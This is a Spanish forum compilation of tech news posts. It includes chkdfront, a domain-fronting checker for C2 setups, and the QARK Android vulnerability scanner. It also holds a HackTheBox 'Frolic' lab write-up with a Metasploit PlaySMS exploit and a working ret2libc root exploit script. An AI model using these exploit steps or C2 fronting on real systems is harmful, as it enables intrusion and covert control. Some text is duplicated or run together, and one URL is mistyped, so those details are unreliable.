chkdfront comprueba si su dominio al frente está funcionando al probar el dominio apuntado (dominio al frente) contra su dominio de dominio frontal.

Caracteristicas

Comprobando su dominio frente al frente de dominio.
Buscando una cadena esperada en la respuesta para indicar el éxito.
Mostrar sugerencias de solución de problemas cuando falla una prueba basada en la falla natural.
Inspeccionar la solicitud y respuesta HTTP cuando falla una prueba. (opcionalmente si tiene éxito).
Solución de problemas con varias verificaciones (ping, HTTP, nslookup) cuando falla una prueba. (opcionalmente si tiene éxito).
Pruebas de apoyo a través de proxy.

Demostración

Consulte la demostración: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Instalación

$ gem install chkdfront

Uso

Help menu:
    -f, --front-target URL           Fronted target domain or URL.
                                      e.g. images.businessweek.com
    -d, --domain-front DOMAIN        DomainFront domain.
                                      e.g. df36z1umwj2fze.cloudfront.net
    -e, --expect STRING              Expect a given string that indicates success. (case-sensitive)
                                      e.g. It works
    -p, --provider NUM               Choose CDN / Domain Front Provider:
                                      [0] Auto    (default - auto tune request. Extra request to detect)
                                      [1] Amazon  (tune request for Amazon domain fronting)
                                      [2] Azure   (tune request for Azure domain fronting)
                                      [3] Alibaba (tune request for Alibaba domain fronting)
    -t, --troubleshoot [DOMAIN]      Force troubleshooting procedures.
                                     execute troubleshooting procedures(ping, http, nslookup) for all parties
                                     (optional: original domain where CDN forwards, to include in the checks)
                                      e.g. c2.mydomain.com
        --proxy USER:PASS@HOST:PORT  Use proxy settings if you're behind proxy.
                                      e.g. user1:Pass123@localhost:8080
        --debug                      Force debugging.
                                     show response's body and low-level request and response debug trace.
                                     (default enabled when test fails.)
    -h, --help                       Show this message.
 
Usage:
  /   usr/local/bin/chkdfront <OPTIONS>
Example:
  /usr/local/bin/chkdfront -f images.businessweek.com -d df36z1umwj2fze.cloudfront.net
  /usr/local/bin/chkdfront -f images.businessweek.com -d df36z1umwj2fze.cloudfront.net --debug -t c2.mysite.com

Contribuyendo

Bifurque ( You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login )
Crea tu rama de características (git checkout -b my-new-feature)
Confirma tus cambios (git commit -am 'Agregar alguna característica')
Push to the branch (git push origin my-new-feature)
Crear una nueva solicitud de extracción

Descargar Chkdfront: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Referencia: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Mozilla está preparando un programa de extensiones recomendadas para Firefox, que está diseñado para aumentar la seguridad de estas piezas de software y la calidad de las mismas en el navegador web libre. Estará disponible el próximo verano.

Las extensiones se han vuelto inmensamente populares como un complemento que amplía las funcionalidades del navegador. Todos los desarrollos principales cuentan con miles de ellas. Algunas son -casi- imprescindibles para muchos usuarios al ampliar el potencial del navegador, aumentar sus características o permitir distintas personalizaciones.

Sin embargo, no todo es positivo en estas pequeñas piezas de software. Muchas no tienen la calidad suficiente, son redundantes, pueden afectar a la seguridad porque son una vía de entrada preferente para el malware y dependiendo del número que tengamos instalado y sus características, pueden afectar al rendimiento y la estabilidad del propio navegador.

De ahí la importancia de estas extensiones recomendadas para Firefox, que pasarán por un proceso de investigación riguroso en Mozilla antes de añadirlas a un programa que evaluará aspectos cómo:

¿Es la extensión realmente buena en lo que hace?
¿La extensión ofrece una experiencia de usuario excepcional?
¿Es la extensión relevante para una audiencia general?
¿Es segura la extensión?
Mozilla preparará un listado inicial de estas extensiones y los usuarios también podrán sugerir otras alternativas. En todos los casos se buscará el compromiso de los desarrolladores en un desarrollo activo y la voluntad de hacer mejoras. Todas las incluidas, incluyendo las sucesivas actualizaciones, pasarán por un proceso de revisión de Mozilla.

Las seleccionadas recibirán una mejor visibilidad en los sitios web y productos de Mozilla, incluido en en el portal general  You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login (AMO). Serán identificables visualmente con varios distintivos y los resultados de búsqueda de AMO y el filtrado se ponderarán hacia las extensiones recomendadas. También estarán mejor situadas en el administrador de complementos del navegador.

Interesante. El usuario podrá seguir instalando las extensiones que prefiera, pero el programa de extensiones recomendadas para Firefox es una buena idea para mejorar la seguridad y calidad del navegador. Estará disponible el próximo verano.

Referencia: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

El navegador Microsoft Edge Chromium ya se había filtrado anteriormente a través de fuentes no oficiales, una situación que apuntaba a un lanzamiento inminente. No andábamos desencaminados, hoy el gigante de Redmond ha liberado la versión previa de dicho navegador de forma general, aunque con un pequeño requisito, y es que tenemos que participar en el canal Microsoft Edge Insider.

Resulta curioso pero es cierto, Microsoft tiene un canal Insider para la mayoría de sus soluciones de software, y su nuevo navegador no ha sido una excepción. Esto confirma que van muy en serio, y que han hecho una apuesta muy importante con la que esperan poder plantar cara a Google Chrome, un navegador que se ha mantenido desde hace años como el gran rival a batir dentro del sector.

Como hemos comentado estamos ante una versión previa de Microsoft Edge Chromium, lo que significa que todavía puede recibir cambios de cara a su versión definitiva, aunque no creemos que vaya a presentar modificaciones importantes a nivel de interfaz ni de características básicas. Dicho esto debemos hablar de las tres grandes opciones que encontraréis en el canal Insider si os decidís a probar este nuevo navegador: Canary, Dev y Beta.




El navegador Microsoft Edge Chromium ya se había filtrado anteriormente a través de fuentes no oficiales, una situación que apuntaba a un lanzamiento inminente. No andábamos desencaminados, hoy el gigante de Redmond ha liberado la versión previa de dicho navegador de forma general, aunque con un pequeño requisito, y es que tenemos que participar en el canal Microsoft Edge Insider.

Resulta curioso pero es cierto, Microsoft tiene un canal Insider para la mayoría de sus soluciones de software, y su nuevo navegador no ha sido una excepción. Esto confirma que van muy en serio, y que han hecho una apuesta muy importante con la que esperan poder plantar cara a Google Chrome, un navegador que se ha mantenido desde hace años como el gran rival a batir dentro del sector.

Como hemos comentado estamos ante una versión previa de Microsoft Edge Chromium, lo que significa que todavía puede recibir cambios de cara a su versión definitiva, aunque no creemos que vaya a presentar modificaciones importantes a nivel de interfaz ni de características básicas. Dicho esto debemos hablar de las tres grandes opciones que encontraréis en el canal Insider si os decidís a probar este nuevo navegador: Canary, Dev y Beta.



La imagen que acompañamos explica a la perfección las diferencias que existen entre cada opción, pero os dejamos un resumen simplificado para que no tengáis dudas:

El canal Canary es lo que podríamos considerar como el "Skip Ahead" del programa Insider de Windows 10, ya que se caracteriza por recibir actualizaciones a diario. Esto significa que será el primero en recibir las novedades, pero éstas podrían no ser del todo estables.
Por contra el canal Dev podríamos definirlo como el anillo rápido. Recibe actualizaciones cada semana y éstas han sido probadas por el equipo de Microsoft, así que son, generalmente, versiones más estables que las que encontramos en el canal Canary.
Finalmente tenemos el canal Beta, que sería el equivalente al anillo lento. Todavía no está disponible, promete actualizaciones totalmente estableces cada seis semanas.
De momento solo podemos disfrutar de Microsoft Edge Chromium bajo Windows 10, pero esperamos que la versión final de dicho navegador llegue también a Windows 7, Windowsd 8.1 y macOS.

Si queréis daros de alta en el programa Microsoft Edge Insider solo tenéis que entrar en este enlace, seleccionar el canal y seguir los pasos del proceso autoguiado.

Referencia: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

El sistema permite la integración con varios proveedores. Ya está disponible en fase beta.

CitarGoogle presentó Anthos, una plataforma que permite conectar nubes de diferentes proveedores.

Google anunció el lanzamiento de su plataforma de nube híbrida Anthos. El sistema, que permite adoptar una infraestructura de nube pública con varios proveedores, ya está disponible en fase beta para todos los clientes.

Además de funcionar con Google Cloud, también lo hace con servicios de otras compañías como Azure de Microsoft o AWS de Amazon. Integra la herramienta Anthos Migrate que facilita la migración entre nubes.

La idea es que se pueda combinar datos y aplicaciones que se encuentran dentro de su infraestructura, haciendo uso de nubes públicas de diferentes compañías.

"La posibilidad de usar varias nubes de forma sencilla e integrada con los sistemas existentes, representa una gran oportunidad en el mercado, que permitirá a las empresas estar más cerca de un mundo en el que se pueda inscribir una aplicación una sola vez y su código pueda funcionar en cualquier lugar", dijo João Bolonha, director de Google Cloud para América Latina.

CitarEl anuncio se hizo en el marco de Google Cloud Next que se lleva a cabo, hasta el jueves, en San Francisco.

Cloud Run

Se trata de una nueva plataforma que permite ejecutar contenedores sin la necesidad de tener que acceder a un servidor. La plataforma aumenta o disminuye automáticamente su tamaño en función del tráfico. De ese modo, el cliente termina pagando solamente por los recursos que realmente utiliza.

Está basado en Knative, una API abierta. Se pueden ejecutar las cargas de trabajo desde un cluster propio, en uno autogestionado de Kubernetes o Google Cloud Platform.

Tal como ocurre con Anthos, Cloud Run permitirá a los clientes utilizar su propia infraestructura combinada con nubes de otros proveedores.

Además de estos anuncios, Google anunció que Cloud estará disponible en dos nuevas regiones a partir del primer trimestre de 2020: la primera será en Seúl, Corea del Sur y, la segunda, Salt Lake City, Estados Unidos.

Esto se suma al desembarco en Osaka, Japón, que ocurrirá en las próximas semanas y Yakarta, Indonesia, donde el servicio estará disponible en el primer trimestre de 2020.

Referencia: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

A mediados del año pasado, Google dio a conocer que durante 2017 todos y cada uno de sus 85.000 empleados no habían sido víctimas de phishing. ¿Cómo lograron esto? Haciendo que el uso de llaves físicas USB, o 'Security Keys', fuese obligatorio. Debido a este éxito, a los pocos meses Google puso a la venta sus propias llaves de seguridad, las Titan Security Keys. Y hoy, está habilitando la opción para que un móvil Android actué como una de estas llaves de seguridad.

Hoy día, el método de autenticación de dos pasos (2FA) es una de las formas más eficaces que tenemos para mantener seguros nuestros accesos a diversos servicios en línea. Sin embargo, no es perfecto y ya ha mostrado en más de una ocasión que su uso a través de SMS es relativamente sencillo de vulnerar. Ahora, con sólo tener un smartphone Android podremos habilitar la 2FA de forma física para mayor seguridad.

Una forma avanzada de autenticación de dos pasos directo en nuestro Android
A pesar de que las llaves de seguridad son relativamente económicas y fáciles de conseguir, mucha gente sigue sin usarlas como método de autenticación de dos pasos, lo que deja en riesgo su información. Google asegura que quiere terminar con esta tendencia al usar nuestro smartphone, que siempre está con nosotros, como método de autenticación y esperar a que esto se masifique.

Para activar un Android como llave de seguridad lo primero que tenemos que hacer es conectarlo vía Bluetooth al navegador Chrome de nuestro ordenador, para que así sirva como método para verificar inicios de sesión. Esta función es compatible por el momento con Gmail, G Suite, Google Cloud y cualquier otro servicio de cuenta de Google.



También necesitaremos habilitar el uso de nuestro smartphone Android como llave de seguridad, también tendremos que entrar a 'myaccount.google.google.com/security' y dentro del apartado de 'autenticación de dos pasos' seleccionar la opción de añadir una llave de seguridad, donde tendremos que elegir nuestro smartphone Android que anteriormente enlazamos a Chrome vía Bluetooth.

Para usarlo, nuestro Android deberá tener al menos la versión 7.0 del operativo y es compatible con Chrome ya sea en Windows o macOS. Además, necesitaremos que nuestro ordenador cuente con conexión Bluetooth. Gracias al chip Titan M, los propietarios de un Pixel 3 podrán usar el botón de volumen para aprobar los inicios de sesión, mientras que el resto de los usuarios de Android tendrán que iniciar sesión en una ventana y pulsar un botón en pantalla.

Para esta función, Google menciona que hace uso de los estándares de autenticación FIDO y WebAuthn, que sirven para verificar que estamos en el sitio correcto y no existe riesgo de phishing. Por el momento sólo está disponible para smartphone Android y en inicios de sesión de servicios de Google, pero la compañía mencionó que ya trabajan con otros servicios que usan el estándar FIDO para añadirlos en un futuro al soporte de llave de seguridad vía Android.

Referencia: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Desde hace unos meses algunos lectores de MuyLinux y personas que me siguen por Twitter me preguntan sobre esa nubecilla azul que aparece en la bandeja del sistema de las distintas distribuciones que he ido utilizando. La respuesta es pCloud, un servicio de almacenamiento en la nube radicado en Suiza.

Yo era cliente de pago de Dropbox, pero la limitación de solo soportar EXT4 descartando BTRFS y XFS me motivó a darme de baja y buscar una alternativa que satisficiera mis necesidades. Tras diversas recomendaciones, me decidí por probar pCloud, y la verdad es que la transición me supuso un reto desde el principio. Primero porque el soporte para GNU/Linux se hace mediante un paquete AppImage y no mediante Deb y/o RPM. El inconveniente de esto es que la aplicación podría no integrarse correctamente en el sistema, cosa que afortunadamente no pasa. A lo expuesto hasta aquí se suma el hecho de que puede funcionar en cualquier distribución, aunque aparentemente parece tener el foco puesto en Ubuntu.

Tras iniciar sesión por primera vez vi que no se sincronizaba con una carpeta local por defecto, sino que montaba una unidad (como un pendrive) que era el almacenamiento en la nube. Sin embargo, esto no quiere decir que el cliente de pCloud no soporte la mencionada característica, ya que cuenta con una sección que permite establecer los directorios que se quieren sincronizar.

Planes
pCloud tiene dos tipos de planes para sus clientes: anuales y para toda la vida (del servicio). De los primeros hay dos posibilidades, una es pagar 3,99 euros al mes (47,88 euros al año) con 500 GB de almacenamiento, 500 GB de descarga de enlace de tráfico y 30 días de historial de papelera de reciclaje, mientras que la segunda ofrece por 7,99 euros al mes (95,88 euros al año) 2 TB de almacenamiento, 2 TB de descarga de enlace de tráfico y 30 días de historial de papelera de reciclaje.



Los planes vitalicios son más caros, pero merecen la pena, ya que mediante un solo pago se puede disfrutar mientras exista el servicio de una capacidad de almacenamiento bastante grande. El primero cuesta 480 euros (ahora 175 euros gracias a un descuento del 65%) y ofrece 500 GB de almacenamiento, 500 GB de descarga de enlace de tráfico y 30 días de historial de papelera de reciclaje, mientras que el segundo cuesta 980 euros (ahora 350 euros gracias a un descuento del 65%) y ofrece 2 TB de almacenamiento, 2 TB de descarga de enlace de tráfico y 30 días de historial de papelera de reciclaje.



Como se puede observar, la propia web de pCloud recomienda los planes de por vida, y es que a la larga salen mucho más económicos. Personalmente, aproveché el pasado verano un descuento para obtener un Plan Premium de por vida por tan solo 175 euros. Con 500GB tengo capacidad más que de sobra para lo que necesito.

El cifrado de ficheros se tiene que contratar aparte
pCloud soporta cifrado de los ficheros, pero se tiene que adquirir aparte del almacenamiento, lo que supone un gasto adicional. Pese a ello, posiblemente esta característica no sea necesaria para la mayoría de los usuarios, estando orientada sobre todo a empresas y personas que manejen datos realmente sensibles o críticos.

El servicio de cifrado de ficheros, cuyo nombre es Crypto, puede ser contratado mediante planes de 4,99 euros al mes, 47,88 euros al año (con 20% de descuento) o 480 euros (ahora 125 euros gracias a un fuerte descuento) de por vida, ofreciendo 14 días de prueba para los indecisos.



El cliente, el talón de aquiles de pCloud
El cliente es posiblemente el gran talón de aquiles de pCloud, al menos de cara a los usuarios de GNU/Linux, habiendo probado la aplicación en Ubuntu, KDE neon, Fedora y openSUSE Leap (esta última con XFCE solo).

Como ya he dicho al principio, se trata de una aplicación AppImage, lo que facilita su ejecución en distribuciones que no sean Ubuntu (la mejor soportada por parte de terceros de largo). Sin embargo, esta no parece estar lo suficientemente pulida, ya que he tenido que soportar algunos bugs molestos como la no posibilidad de acceder a la interfaz gráfica (apareciendo una ventana en blanco que no me permitía acceder a las opciones), aunque pese a ello sincronizaba correctamente.

Los otros problemas que he encontrado han sido tras actualizar el propio cliente, obteniendo, al menos aparentemente, una configuración de usuario corrupta que no me permitía utilizar correctamente la aplicación. En esas ocasiones he tenido que matar los procesos relacionados con el cliente, borrar toda la configuración de usuario de pCloud (que se localiza en "/home/tuusuario/.pcloud" y "/home/tuusuario/.config/pcloud", teniéndose que borrar dichos subdirectorios) y volver a iniciar el servicio desde el propio paquete AppImage partiendo desde cero (no es necesario borrar las carpetas locales sincronizadas).

Por otro lado, a veces noto cierto retraso cuando coloco un fichero en la carpeta local, ya que el cliente de pCloud tarda un poco en empezar a sincronizarlo hacia el almacenamiento en la nube correspondiente a mi cuenta personal.

Quitando los mencionados inconvenientes, el cliente de pCloud resulta bastante competente y sobre todo flexible. Se integra perfectamente en GNOME, Plasma 5 (aunque usando el diálogo de GNOME) y XFCE, siendo capaz de iniciarse junto con la sesión del usuario sin ningún problema.



pCloud, un gran servicio con un cliente mejorable
Más allá de los problemas que he detectado en su cliente para GNU/Linux, pCloud se muestra como un servicio muy competente, ya que de momento no he notado ninguna pérdida de ficheros, lo que muestra que trabaja de forma correcta a la hora de sincronizar y que los inconvenientes se localizan todos en el propio cliente.

Viendo que muchas compañías pasan olímpicamente de dar soporte a GNU/Linux a pesar de que en los últimos años ha conseguido penetrar bastante en los escritorios profesionales, pCloud se convierte en una gran opción en circunstancias concretas.

Referencia: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Hace un tiempo llegó al mercado YouTube Premium. Este servicio engloba acoge también a YouTube Music y ofrece uno de los servicios streaming más completos del mercado. Uno de los beneficios de pagar la suscripción es poder ver vídeos en ventana flotante. Sí, lo que Google apodó como Picture in Picture. Esta característica también la vieron algunos usuarios de Estados Unidos con cuentas normales, es decir, sin pagar. Ahora parece que YouTube está llevando esta característica a otros países del globo. Es una gran noticia, pues visualizar contenido en ventana flotante te permite realizar otras acciones en el móvil mientras ves ese contenido.

YouTube Premium permite incluso reproducir contenido en segundo plano escuchando solo el audio. Esto no está disponible de forma gratuita, pues es una de las ventajas más importantes por las que los usuarios pagan una cuota mensual a YouTube. Si tienes una cuenta gratuita hay muy pocas probabilidades de que algún día puedas reproducir contenido en segundo plano. Eso sí, la cosa cambia con la ventana flotante.

La reproducción en ventana flotante sale de Estados Unidos


Parece que algunos usuarios han comenzado a reportar que la función de ventana flotante está disponible en sus países. Hablamos de cuentas gratuitas por las que los usuarios no pagan nada. Esto es lo mismo que hace un tiempo permitió YouTube en EEUU, pero llevado a más países de todo el globo. Los primeros indicios parecen llegar de Italia, donde algunos usuarios ya están pudiendo ver contenido en ventana flotante sin necesidad de pagar.

Esta característica permite a los usuarios poder navegar por Chrome o hablar por WhatsApp mientras ven un vídeo de YouTube. No se trata de reproducción en segundo plano, pero casi. En todo momento tendrás que estar viendo el contenido en vídeo, pero no a pantalla completa. Es algo parecido a lo que hace YouTube dentro de su propia aplicación: te permite minimizar el vídeo para seguir navegando por la interfaz.

Estamos deseando ver que esta opción se extiende. Por el momento YouTube no se ha pronunciado, por lo que habrá que esperar para conocer más detalles. Puede que haya sido una simple prueba, un error de la aplicación o algo intencionado que se está implantando en más mercados.

Referencia: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

En este post haremos la máquina Frolic de HackTheBox.
Es una máquina Linux de nivel medio que nos ayudará a aprender sobre el desarrollo de exploits para binarios con NX pero sin ASLR, es decir ret-2-libc.

Write-Up
Enumeración
Como siempre, lo primero sera un escaneo de todos los puertos con nmap:

1	nmap -sC -sV 10.10.10.111

Como veis, hay un SSH, un SMB y un HTTP.
Vamos a enumerar la web con dirsearch recursivamente.

1	dirsearch -u http://frolic.htb:9999/ -r -e php -t 50 -x 403

Accediendo aYou are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Loginvemos un código Okk!

En You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login encontramos un base64 que tras decodificarlo vemos que es un ZIP con contraseña.

Podemos hacerle fuerza bruta al zip con fcrackzip:
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

El ZIP contiene un fichero index.php que es un hexadecimal. Pasamos el hexadecimal a ascii obteniendo un base64 que contiene un código brainfuck.

Tras decodificar el Brainfuck, obtenemos: idkwhatispass
Revisando los resultados del Dirsearch vemos que hay un http://frolic.htb/dev/backup

Mediante las credenciales admin:idkwhatispass podremos acceder al playsms.

Explotación
El PlaySMS es vulnerable, podremos obtener shell mediante un módulo de metasploit: multi/http/playsms_uploadcsv_exec

123456	use multi/http/playsms_uploadcsv_execset rhosts 10.10.10.111set lhost tun0set rport 9999    set targeturi /playsms/set password idkwhatispass

Post-Explotación
Para acceder al usuario root tendremos que ser capaces de desarrollar un exploit para un binario con el bit NX activo pero sin ASLR en el sistema. Yo usaré la técnica ret2libc.

Lo primero es buscar binarios con el bit SUID activo utilizando el comando find:

1	find / -perm -4000 2>/dev/null

Encontramos el binario: /home/ayush/.binary/rop que pertenece al usuario root.
ASLR desactivado:

1	cat /proc/sys/kernel/randomize_va_space

Como veíaimos en la guia de ret-2-libc: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login, necesitamos la longitud de nuestro relleno y las direcciones de system, exit y /bin/sh en la biblioteca libc.
Vamos a hacernos una plantilla que iremos completando:

123456789101112	import struct def m32(dir):return struct.pack("I",dir) padding =base =sys = m32(base + )exit = m32(base + )binsh = m32(base + ) print padding + sys + exit + binsh

Busquemos la longitud de nuestro relleno con msf-pattern:

La longitud de nuestro relleno será 52 bytes, busquemos las direcciones de la biblioteca libc, de system, de exit y de /bin/sh.

Nuestro exploit será:

123456789101112	import struct def m32(dir):return struct.pack("I",dir) padding = "A" * 52base = 0xb7e19000sys = m32(base + 0x0003ada0)exit = m32(base + 0x0002e9d0)binsh = m32(base + 0x15ba0b) print padding + sys + exit + binsh

Ejecutemoslo:

1	./rop $(python /tmp/exploit)

Referencia: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Q RÁPIDO  A ndroid  R eview  K ella – Esta herramienta está diseñada para buscar varias vulnerabilidades de las aplicaciones relacionadas con la seguridad de Android, ya sea en código fuente o APK envasados. La herramienta también es capaz de crear APKs y / o comandos desplegables de "Prueba de concepto", capaces de explotar muchas de las vulnerabilidades que encuentra. No es necesario rootear el dispositivo de prueba, ya que esta herramienta se enfoca en las vulnerabilidades que pueden ser explotadas en condiciones de seguridad.

QARK es fácil de usar, una herramienta capaz de encontrar vulnerabilidades de seguridad comunes en las aplicaciones de Android. A diferencia de los productos comerciales, es 100% de uso gratuito. QARK presenta información educativa que permite a los revisores de seguridad localizar explicaciones precisas y detalladas de las vulnerabilidades. QARK automatiza el uso de múltiples descompiladores, aprovechando sus salidas combinadas, para producir resultados superiores, al descompilar APKs. Finalmente, la principal ventaja que QARK tiene sobre las herramientas tradicionales, que solo le apuntan a posibles vulnerabilidades, es que puede producir comandos ADB, o incluso APK completamente funcionales, que convierten vulnerabilidades hipotéticas en explotaciones "POC" de trabajo.

Incluidos en los tipos de vulnerabilidades de seguridad que esta herramienta intenta encontrar son:

Componentes exportados inadvertidamente
Componentes exportados incorrectamente protegidos
Intenciones que son vulnerables a la intercepción o espionaje
Validación incorrecta del certificado x.509
Creación de archivos de lectura mundial o de escritura mundial.
Actividades que pueden filtrar datos.
El uso de intenciones pegajosas
Inesperadamente creadas intenciones pendientes
Envío de intenciones de transmisión inseguras.
Claves privadas incrustadas en la fuente.
Uso de criptografía débil o impropio.
Configuraciones de WebView potencialmente explotables
Actividades preferidas exportadas
Robo de pata
Aplicaciones que permiten realizar copias de seguridad.
Aplicaciones que son depurables
Aplicaciones compatibles con versiones de API obsoletas, con vulnerabilidades conocidas

Instalación:

~ git clone https://github.com/linkedin/qark
~ cd qark
~ pip install -r requirements.txt
~ pip install . --user  # --user is only needed if not using a virtualenv

Uso:

To run in interactive mode:
$ python qarkMain.py
To run in headless mode:

$ python qarkMain.py --source 1 --pathtoapk /Users/foo/qark/sampleApps/goatdroid/goatdroid.apk --exploit 1 --install 1
or
$ python qarkMain.py --source 2 -c /Users/foo/qark/sampleApps/goatdroid/goatdroid --manifest /Users/foo/qark/sampleApps/goatdroid/goatdroid/AndroidManifest.xml --exploit 1 --install 

Fuente:  You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Referencia: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Samsung lanza One Hand Operation, una aplicación para manejar tu teléfono Android con una mano. Y para ser más concretos, con un solo pulgar.

Hay dos clases de usuarios de teléfono móvil. Quienes lo utilizan con una mano y quienes lo hacen con dos manos. Los segundos son mayoría, más que nada porque muchas funciones, aplicaciones y juegos requieren ambas manos para ser usadas.

Quienes emplean una mano, cada vez lo tienen más complicado, por lo comentado antes y porque las pantallas son más grandes con cada nuevo modelo. ¿Cómo resolver este problema?

Una posibilidad consiste en instalar One Hand Operation +, una aplicación oficial de Samsung pensada para facilitar el manejo de tu smartphone Android con una mano.



Si bien algunos modelos Samsung ya cuentan con una función similar, que encontraremos en Ajustes buscando "modo operación con una mano" y que consiste en reducir el tamaño de la pantalla para facilitar su manejo con un pulgar, esta app móvil para Android va más allá.

En concreto, One Hand Operation + aprovecha gestos con nuestro dedo pulgar de izquierda a derecha o de derecha a izquierda para así ejecutar determinadas acciones que, de otra manera, deberíamos activar mediante ambos pulgares.

Izquierda, derecha y más

Una vez hemos instalado y activado One Hand Operation +, ya podemos configurar qué gestos y acciones queremos emplear.

Los gestos se pueden realizar de izquierda a derecha o de derecha a izquierda. A partir de ahí, distintos gestos nos permitirán configurar diferentes actividades. Por un lado, podemos deslizar el pulgar de un lado a otro de la pantalla de manera corta o larga. Y a su vez, el deslizamiento puede ser en línea recta, en diagonal hacia arriba o en diagonal hacia abajo. En total, doce acciones posibles que podemos o no activar o desactivar.

En cuanto a las acciones que se pueden asociar a los doce gestos mencionados, incluye el botón Home, el botón Reciente y Atrás, el botón de Menú, podemos activar la aplicación que hemos visto previamente, hacer una captura de pantalla, volver atrás en el navegador web, abrir el panel de notificaciones o los ajustes rápidos de Android sin necesidad de estirar el pulgar hacia la parte superior de la pantalla.



Más opciones interesantes. Desde el menú de opciones avanzadas o Advanced settings (Ajustes avanzados) es posible activar funciones prácticas como que estos gestos funcionen también si tenemos el smartphone en posición horizontal o apaisada o configurar una lista de aplicaciones y juegos que no harán caso a los gestos, muy útil en el caso de apps que emplean gestos propios. Así no habrá problemas entre unos y otros.

Los responsables de la aplicación One Hand Operation + recomiendan empezar a usar los gestos básicos o cortos. Una vez nos hayamos acostumbrado, podremos activar también los gestos largos, más avanzados. Para ello sólo tenemos que abrir la app e ir a Left handle (Controlador izquierdo) o Right handle (Controlador derecho) respectivamente para activar o desactivar los gestos largos pulsando en el botón al lado de Long Swipe (Deslizamiento largo).

Otro elemento a configurar son los indicadores de los gestos, que suelen ser pequeños por defecto y prácticamente invisibles. Por nuestra parte, podemos regular el nivel de transparencia y el tamaño de los iconos o indicadores.

Referencia: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login. Así se ha denominado a la primera certificación técnica profesional española en criptografía.


De la mano de CriptoCert S.L., compañía española recientemente fundada y focalizada en la promoción, difusión, educación, capacitación técnica y certificación de profesionales en el campo de la criptografía y protección de la información, así como de su aplicación en el mundo real, nace CriptoCert Certified Crypto Analyst, la primera certificación técnica profesional de criptografía y protección de la información en español, que cuenta además con el reconocimiento del Centro Criptológico Nacional (CCN), centro responsable de la seguridad y protección de las comunicaciones de las administraciones públicas en España (adscrito al Centro Nacional de Inteligencia, CNI).

El objetivo principal de esta certificación es capacitar y acreditar de manera rigurosa a profesionales mediante contenidos técnicos extensos, detallados y actualizados. Como segundo objetivo, se plantea la difusión del uso de la criptografía y su utilización práctica, lo que se conoce como criptografía aplicada. Dado que uno de los fundamentos de la criptografía son las matemáticas, y aunque la certificación estudia los conceptos y principios matemáticos necesarios para comprender el funcionamiento de múltiples sistemas y protocolos criptográficos, y en cómo aplicar la criptografía de forma práctica en numerosos escenarios desde el punto de vista de la ingeniería, evita lo más posible profundizar en esa faceta más teórica.

En resumen, la ambición de esta innovadora iniciativa española es extender los complejos conocimientos vinculados al mundo de la criptología a un mayor número de profesionales de una manera clara y entendible, para que dispongan de las capacidades de análisis y comprensión de los elementos criptográficos, de cara a su aplicación en la protección de soluciones y entornos tecnológicos.

Hoy en día, la criptografía no sólo es una moda: ejemplos significativos de su utilización están presentes en el día a día en múltiples sistemas, aplicaciones, protocolos, comunicaciones, arquitecturas y dispositivos. Y es menester que los técnicos, ingenieros e incluso directivos de empresas, organizaciones, administración pública y otros entornos civiles o militares, conozcan cómo funciona la criptografía y sepan de sus fortalezas y de sus debilidades.

La certificación está dirigida preferentemente a:

Estudiantes de cursos y másteres tecnológicos
Estudiantes universitarios de carreras técnicas
Fuerzas y cuerpos de seguridad del Estado
Especialistas en seguridad informática
Responsables y directivos encargados de la protección de datos
Arquitectos de soluciones criptográficas
Especialistas en criptomonedas y blockchain
Programadores y desarrolladores de aplicaciones y software
Ingenieros de hardware
Profesionales de tecnologías de la información y comunicaciones

Fuente: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

El Consejo Profesional de Ingeniería de Telecomunicaciones, Electrónica y Computación - COPITEC, invita a los lectores de You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login a participar de su próximo curso, poniendo a disposición de los interesados, un descuento especial. Este beneficio consiste en la posibilidad de inscribirse en el Curso de Informática Forense con precio especial (30% de descuento sobre el valor no matriculado), mencionando a You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login.

Todas las consultas sobre inscripción deben realizarse al siguiente correo electrónico:
actualizacion_profesional[arroba]copitec.org.ar

Info forenseYou are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login



Objetivos
Lograr que el profesional se inicie en el mundo de la Informática Forense, para que puedan efectuar pericias en el ámbito judicial y/o tareas investigativas ante un fraude en una organización.

Dirigido a
Profesionales vinculados con la Tecnología de la Información que pretendan iniciarse en el mundo de la Informática Forense
Especialmente destinado a peritos que se inician y no tienen experiencia o poseen escasos conocimientos técnicos sobre métodos y procedimientos técnicos para efectuar pericias informáticas.

Modalidad
Presencial y distancia

Duración
18 horas distribuidas en 6  clases de 3hs. cada una

Días y horarios
Martes y Jueves desde el 23 de abril al 9 de mayo de 2019 de 18 a 21 hs.

Inscribite a este curso y accede a un descuento de 30% de descuento sobre el valor no matriculado mencionando a nuestro blog y a You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login.

